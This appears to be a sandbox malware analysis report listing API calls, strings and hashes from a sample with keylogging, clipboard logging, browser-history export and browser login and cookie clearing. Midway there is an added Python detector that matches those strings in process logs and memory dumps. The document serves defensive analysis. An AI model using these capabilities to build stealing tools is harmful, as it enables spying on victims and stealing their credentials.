                                                                                                                                                                                          • Instruction ID: f31289fd9d699b06c41f7a0dd522d8b38f8464f47830024adc65ef0280f1a9f9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 99786426fa04367196df5dcd6138f2c741ad56ee1871359df960091d0e0ec61b
                                                                                                                                                                                          • Instruction Fuzzy Hash: B1F0D112F9A0151AEB24012ACC517A2B7AA9B923A9F1C45739881E22D1D43CF902C29A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32(?,?,?,?), ref: 00406A20
• CreateFileA.KERNEL32(?,?,?,?,00000005,00000000,00000000,?,?,?,?), ref: 00406AD8
• GetLastError.KERNEL32(?,?,?,?,00000005,00000000,00000000,?,?,?,?), ref: 00406AE4
• CloseHandle.KERNEL32(00000000), ref: 00406B51
Memory Dump Source
• Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
Similarity
• API ID: File$AttributesCloseCreateErrorHandleLast
• API String ID: 2927643983-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(00000000,0040D0D4), ref: 00401035
• GetEnvironmentStrings.KERNEL32 ref: 0040B514
• GetCommandLineA.KERNEL32 ref: 0040B51E
Memory Dump Source
• Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
Similarity
• API ID: CommandEnvironmentHandleLineModuleStrings
• API String ID: 1584138308-0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
Uniqueness
Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,14646FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 14648731
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 146487BA
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 146487CC
• __freea.LIBCMT ref: 146487D5
  • Part of subcall function 146456D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 14645702
Memory Dump Source
• Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
• Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• API String ID: 2652629310-0
Uniqueness
Uniqueness Score: -1.00%

Strings
• [Cleared browsers logins and cookies.], xrefs: 1233C0E4
• Cleared browsers logins and cookies., xrefs: 1233C0F5
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Similarity
• API ID: Sleep
• String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
• API String ID: 3472027048-1236744412
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Similarity
• API ID: SystemTimes$Sleep__aulldiv
• API String ID: 188215759-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,14641D66,00000000,00000000,?,14645C88,14641D66,00000000,00000000,00000000,?,14645E85,00000006,FlsSetValue), ref: 14645D13
• GetLastError.KERNEL32(?,14645C88,14641D66,00000000,00000000,00000000,?,14645E85,00000006,FlsSetValue,1464E190,FlsSetValue,00000000,00000364,?,14645BC8), ref: 14645D1F
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,14645C88,14641D66,00000000,00000000,00000000,?,14645E85,00000006,FlsSetValue,1464E190,FlsSetValue,00000000), ref: 14645D2D
Memory Dump Source
• Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
• Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: cf864c44325957709022161106441fdc1f59da1c55ef9d8dd52134060d5190b4
• Instruction ID: 8c8e6b85c16866518abf979c69b5dc586d539c906f422b12f41503fea9741683
• Opcode Fuzzy Hash: cf864c44325957709022161106441fdc1f59da1c55ef9d8dd52134060d5190b4
• Instruction Fuzzy Hash: 5001AC367112366BCF315E689C8CA46775CEF25AA9B290625FB05D7A40D730D402CAD4
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 005CA65C
  • Part of subcall function 005CAC94: ___AdjustPointer.LIBCMT ref: 005CACDE
• _UnwindNestedFrames.LIBCMT ref: 005CA673
• ___FrameUnwindToState.LIBVCRUNTIME ref: 005CA685
• CallCatchBlock.LIBVCRUNTIME ref: 005CA6A9
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
• String ID:
• API String ID: 2633735394-0
• Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
• Instruction ID: 9844b835f91a17ccfa4ff27d99298901a54ff87d7eb6abe2b53e45a6381fc8ea
• Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
• Instruction Fuzzy Hash: 5801B332400109AFCF125EA5CD05FDA3FAAFB88758F194019F91866120D376A8A1EBA6
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetSystemMetrics.USER32(0000004C), ref: 123493F0
• GetSystemMetrics.USER32(0000004D), ref: 123493F6
• GetSystemMetrics.USER32(0000004E), ref: 123493FC
• GetSystemMetrics.USER32(0000004F), ref: 12349402
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: MetricsSystem
• String ID:
• API String ID: 4116985748-0
• Opcode ID: 8b2ff39deab7576a70af653f9587165294241c64ae6cb72593d5c84c69c70645
• Instruction ID: 6744feb7cdfd49c22b455278afc33263dc9457639b29de48414e7d7e72bd5374
• Opcode Fuzzy Hash: 8b2ff39deab7576a70af653f9587165294241c64ae6cb72593d5c84c69c70645
• Instruction Fuzzy Hash: 99F04FA2B043955BD394DA75CC44A2F6BD6AFC4260F2048BEE6098B381EEB4DC058B91
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 005C9D13
• ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 005C9D18
• ___vcrt_initialize_locks.LIBVCRUNTIME ref: 005C9D1D
  • Part of subcall function 005CB21C: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 005CB22D
• ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 005C9D32
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
• String ID:
• API String ID: 1761009282-0
• Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
• Instruction ID: 0a9096911c0944c4a10d0bcf52f8340a98e95cf27e9ab1d1de8c4966a733bb33
• Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
• Instruction Fuzzy Hash: E0C0010C0006466C2C103AF1221FFAE9F407DE2B86FA46A8DB8A23A403AA060D5A6022
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: __freea
• String ID: >N^
• API String ID: 240046367-865931248
• Opcode ID: fb6195c260b9ae5d4324619eca1f95c452dc13a98459a94436f4153b7f964d62
• Instruction ID: 7c49aa9249258e033b1fa4775ad335b2f847e284416e358fc630403511f5a804
• Opcode Fuzzy Hash: fb6195c260b9ae5d4324619eca1f95c452dc13a98459a94436f4153b7f964d62
• Instruction Fuzzy Hash: 7991B171E002969ADF288FA6CD85AEEBFB9BB49310F184659E885E7241D735DC40CF60
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 005D8FF7: _free.LIBCMT ref: 005D902E
  • Part of subcall function 005D8FF7: _abort.LIBCMT ref: 005D9075
• _wcschr.LIBVCRUNTIME ref: 005E2C2C
• _wcschr.LIBVCRUNTIME ref: 005E2C3A
Strings
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: _wcschr$_abort_free
• String ID: UX]
• API String ID: 2269257601-4069445468
• Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
• Instruction ID: 7c62ca9e638cbb0aa022fbd1713b438e5fd6af329af7ec66704a85a095b22388
• Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
• Instruction Fuzzy Hash: A961EB72600247AAD72CAF76CC4ABBA7BACFF44300F14446AF989D7185EA70DD41C7A4
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 005995F3
• __CxxThrowException@8.LIBVCRUNTIME ref: 005996D4
Strings
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: Exception@8H_prologThrow
• String ID: hdF
• API String ID: 3222999186-665520524
• Opcode ID: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
• Instruction ID: 379a1acd38d4ce2fff90b014f9c69876fc7e4afc0ff65bc1f15edb1d8b405283
• Opcode Fuzzy Hash: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
• Instruction Fuzzy Hash: E2513C7290020ABBCF14FBA4DD5A9ED7F68BF91300F50015DB80696192EF349F49CB91
Uniqueness

Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 1464655C
  • Part of subcall function 146462BC: IsProcessorFeaturePresent.KERNEL32(00000017,146462AB,00000000,?,?,?,?,00000016,?,?,146462B8,00000000,00000000,00000000,00000000,00000000), ref: 146462BE
  • Part of subcall function 146462BC: GetCurrentProcess.KERNEL32(C0000417), ref: 146462E0
  • Part of subcall function 146462BC: TerminateProcess.KERNEL32(00000000), ref: 146462E7
Strings
Memory Dump Source
• Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
• Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
Similarity
• API ID: Process$CurrentFeaturePresentProcessorTerminate_free
• String ID: *?$.
• API String ID: 2667617558-3972193922
• Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
• Instruction ID: 71d027ee24beb54f69d52998898cc7061112bb0439d6b8daf87f3a0eeac37e73
• Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
• Instruction Fuzzy Hash: EB518575E0020ADFDF05CFA8C8406ADBBB5EF68318F388169D558E7345D639AE018B54
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: __fassign
• String ID: PkGNG
• API String ID: 3965848254-263838557
• Opcode ID: 0bfd670419a30e70b2122a04c0ff37dc7c92f96e788d8b5757dd12d671b03cbd
• Instruction ID: 2ab1cf02f251a95dd18b82d38afd7d446144d0a0d164f0c26ee8b34f67fb4faa
• Opcode Fuzzy Hash: 0bfd670419a30e70b2122a04c0ff37dc7c92f96e788d8b5757dd12d671b03cbd
• Instruction Fuzzy Hash: 0B51607190024AAFDB20CFACD885AEEBFF4FB09310F14856BE955E7391D6309941CB65
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: _memcmp_wcslen
• String ID: ?
• API String ID: 1846113162-1684325040
• Opcode ID: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
• Instruction ID: 76a1c639bec36f43b1f9c7f2cc1e9a016f453073781b491185dc4ceb0867ff5c
• Opcode Fuzzy Hash: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
• Instruction Fuzzy Hash: 21416F71508316EFDB20DFA4D848AAFBFECBB99751F00092AF555C2161EB74C948CB92
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 12334066
  • Part of subcall function 1234B978: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,12396468,1233D20D,.vbs,?,?,?,?,?,123A52F0), ref: 1234B99F
  • Part of subcall function 12348568: CloseHandle.KERNEL32(123340F5,?,?,123340F5,12395E74), ref: 1234857E
  • Part of subcall function 12348568: CloseHandle.KERNEL32(12395E74,?,?,123340F5,12395E74), ref: 12348587
  • Part of subcall function 1234C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,1233A843), ref: 1234C49E
• Sleep.KERNEL32(000000FA,12395E74), ref: 12334138
Strings
• /sort "Visit Time" /stext ", xrefs: 123340B2
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
• String ID: /sort "Visit Time" /stext "
• API String ID: 368326130-1573945896
• Opcode ID: 397a6cced3a4d4c9cf7d355418eda07bb8a790510c660b27a52c9a1eb619ad88
• Instruction ID: 37d9114549791177351191eea28ee58e43f7a6f135f5987bcf0d3e02466e645c
• Opcode Fuzzy Hash: 397a6cced3a4d4c9cf7d355418eda07bb8a790510c660b27a52c9a1eb619ad88
• Instruction Fuzzy Hash: 9A31413B9102185BCB66E7B4DC949FE7779AF90302F400165D146E7194EF206F4ACB91
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: _strftime
• String ID: dMG$|MG
• API String ID: 1867682108-1683252805
• Opcode ID: bbdb414fb79269bf773295af42d5df5de67eea351094c48e52f104940b22c49b
• Instruction ID: c25a9a5173f561076fd4333ba925af670d8c373e999510ed5d033984224649cf
• Opcode Fuzzy Hash: bbdb414fb79269bf773295af42d5df5de67eea351094c48e52f104940b22c49b
• Instruction Fuzzy Hash: 4E315E31504302AFDB24EB60DD5AAAE7BA8FBD4300F40453DF149821E1EF709E49CB5A
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 12364770: __onexit.LIBCMT ref: 12364776
• __Init_thread_footer.LIBCMT ref: 1233B797
Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: Init_thread_footer__onexit
• String ID: [End of clipboard]$[Text copied to clipboard]
• API String ID: 1881088180-3686566968
• Opcode ID: ac1a759854e643147470ffe83c858acb222773e7e94efd10205d04e87054609b
• Instruction ID: ce4a5f844ff48fb29387deccc0aeee737ed0932e4d452ef378064df1263ecadb
• Opcode Fuzzy Hash: ac1a759854e643147470ffe83c858acb222773e7e94efd10205d04e87054609b
• Instruction Fuzzy Hash: B821A73B9002194ECB69E774D890DFDB77AAF50312F50052AD50697194FF347F4ACA90
Uniqueness

Uniqueness Score: -1.00%
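
Two of the function entries in the 12330000 dump give strings worth turning into hunt logic: the argument template `/sort "Visit Time" /stext "` built next to GetModuleFileNameW/CreateFileW/Sleep (xref 123340B2), and the `[Text copied to clipboard]` / `[End of clipboard]` markers in the function at 1233B797. The following is an added example written for this edit; it is not part of the Joe Sandbox report and not code from the sample. It assumes process-creation records with Sysmon Event ID 1 field names (`Image`, `CommandLine`), the sample events and dump bytes are constructed, and it checks the clipboard markers in both ASCII and UTF-16LE because the report does not state the encoding. `/stext` is a "save as text" switch familiar from NirSoft command-line utilities, but the report does not name the dropped tool, so that attribution is an inference and the matcher keys only on the exact string the report shows.

```python
import re

# Strings copied from the function entries in this report: the argument
# template at xref 123340B2 and the clipboard-logger markers at 1233B797.
HISTORY_DUMP_ARGS = '/sort "Visit Time" /stext "'
CLIPBOARD_MARKERS = ("[Text copied to clipboard]", "[End of clipboard]")

# /stext <path>: the report shows the quoted form; accepting an unquoted
# path as well is an assumption so a path without spaces is still caught.
_STEXT_RE = re.compile(r'/stext\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)
_SORT_RE = re.compile(r'/sort\s+"Visit Time"', re.IGNORECASE)


def find_history_dumps(events):
    """Return (image, output_path) for every process-creation event whose
    command line carries both switches from the report's string.
    `events` are dicts with Sysmon Event ID 1 field names 'Image' and
    'CommandLine' (assumed log source). The captured path is the text
    file the history export is written to, which is worth collecting."""
    hits = []
    for ev in events:
        cmd = ev.get("CommandLine", "")
        stext = _STEXT_RE.search(cmd)
        if stext and _SORT_RE.search(cmd):
            hits.append((ev.get("Image", ""), stext.group(1) or stext.group(2)))
    return hits


def find_clipboard_markers(blob):
    """Scan a memory dump (bytes) for the clipboard-logger markers in both
    ASCII and UTF-16LE, since the report does not say which encoding the
    sample writes them in. Returns a sorted list of (offset, marker, encoding)."""
    found = []
    for marker in CLIPBOARD_MARKERS:
        for enc in ("ascii", "utf-16-le"):
            needle = marker.encode(enc)
            start = 0
            while (pos := blob.find(needle, start)) != -1:
                found.append((pos, marker, enc))
                start = pos + 1
    return sorted(found)


# Constructed sample input (not from the report): two benign events and one
# that matches the history-export pattern.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"Image": r"C:\Users\Public\hist_tool.exe",
     "CommandLine": r'"C:\Users\Public\hist_tool.exe" '
                    + HISTORY_DUMP_ARGS + r'C:\Users\Public\hist.txt"'},
    # /stext alone is not enough; the report's string pairs it with /sort.
    {"Image": r"C:\Tools\export.exe",
     "CommandLine": r'export.exe /stext "C:\Tools\out.txt"'},
]

# Constructed dump fragment: first marker in UTF-16LE at offset 4, second in
# ASCII at offset 60 (4 + 26 chars * 2 bytes + 4 bytes of filler).
SAMPLE_DUMP = (b"\x00" * 4
               + CLIPBOARD_MARKERS[0].encode("utf-16-le")
               + b"h\x00i\x00"
               + CLIPBOARD_MARKERS[1].encode("ascii")
               + b"\x00")

if __name__ == "__main__":
    for image, path in find_history_dumps(SAMPLE_EVENTS):
        print(f"history export: {image} -> {path}")
    for off, marker, enc in find_clipboard_markers(SAMPLE_DUMP):
        print(f"0x{off:x} {enc}: {marker}")
```

Requiring both switches keeps the command-line check from firing on every legitimate use of a `/stext` export; the output path it captures is the file to pull from the host, since that is where the harvested browsing history lands before exfiltration.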

APIs
• _wcslen.LIBCMT ref: 005A70D7
  • Part of subcall function 0059ABC6: _wcslen.LIBCMT ref: 0059ABDF
Strings
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: _wcslen
• String ID: !D@$PG
• API String ID: 176396367-1987221222
• Opcode ID: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
• Instruction ID: 9cab077bf046a24f4c5f39c5ddc59979f1098d9878313069d0439688a53d3919
• Opcode Fuzzy Hash: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
• Instruction Fuzzy Hash: 6C11D2207442433BDE1C77709C2AFBE2A8BBBD1300F50842EF44A8F6E2DEA80C469215
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: H_prolog
• String ID: NG$}E
• API String ID: 3519838083-2251168990
• Opcode ID: 531294bc55fe6296708d9916624f17236c631622ca51f748c31d8835be279a7a
• Instruction ID: 18ef6193023b93b2001c4837adbf78fa7b235d1f44383af6b86f70fb50bc55b1
• Opcode Fuzzy Hash: 531294bc55fe6296708d9916624f17236c631622ca51f748c31d8835be279a7a
• Instruction Fuzzy Hash: DC215336D001099BDF15EBA4D957AFEBB76FF80310F60812AF515A2191DF341E058B40
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
• Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
Similarity
• API ID: _strlen
• String ID: : $Se.
• API String ID: 4218353326-4089948878
• Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
• Instruction ID: 49ae106f25e449103ceba9b15f5dd1f4556a04309f373c75336c8a38c81c8876
• Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
• Instruction Fuzzy Hash: EC110A75A00389AEDF11CFA8D841BDDFBFCEF19208F244056E645E7252E6706B02C765
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: _wcslen
• String ID: $$cF
• API String ID: 176396367-3386849937
• Opcode ID: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
• Instruction ID: fd719cc48284dd5d84fcf129696db2a4c355d4fde6e48cfede0ea8cd22c2193a
• Opcode Fuzzy Hash: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
• Instruction Fuzzy Hash: 9111C671914219ABCF10E6989C49FDEBBBCAF48710F250067F804B3241EA788A448A66
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 1233B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 1233B172
  • Part of subcall function 1233B164: wsprintfW.USER32 ref: 1233B1F3
  • Part of subcall function 1234B4EF: GetLocalTime.KERNEL32(00000000), ref: 1234B509
• CloseHandle.KERNEL32(?), ref: 1233B0B4
• UnhookWindowsHookEx.USER32 ref: 1233B0C7
Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
• String ID: Online Keylogger Stopped
• API String ID: 1623830855-1496645233
• Opcode ID: 0ca69f09bdd1a2910762349e98f7bf3dc20463767c10de209a55e024eb12998e
• Instruction ID: 195fde748c64d5dee48657937eb66e762bcb2b8b2804fed3eeb8f0dbb2ca571d
• Opcode Fuzzy Hash: 0ca69f09bdd1a2910762349e98f7bf3dc20463767c10de209a55e024eb12998e
• Instruction Fuzzy Hash: 1D01283BA002445BDB777B34CC0A3BE7BB6AB82302F40055CD486065D5FB712A49D7D2
Uniqueness

Uniqueness Score: -1.00%
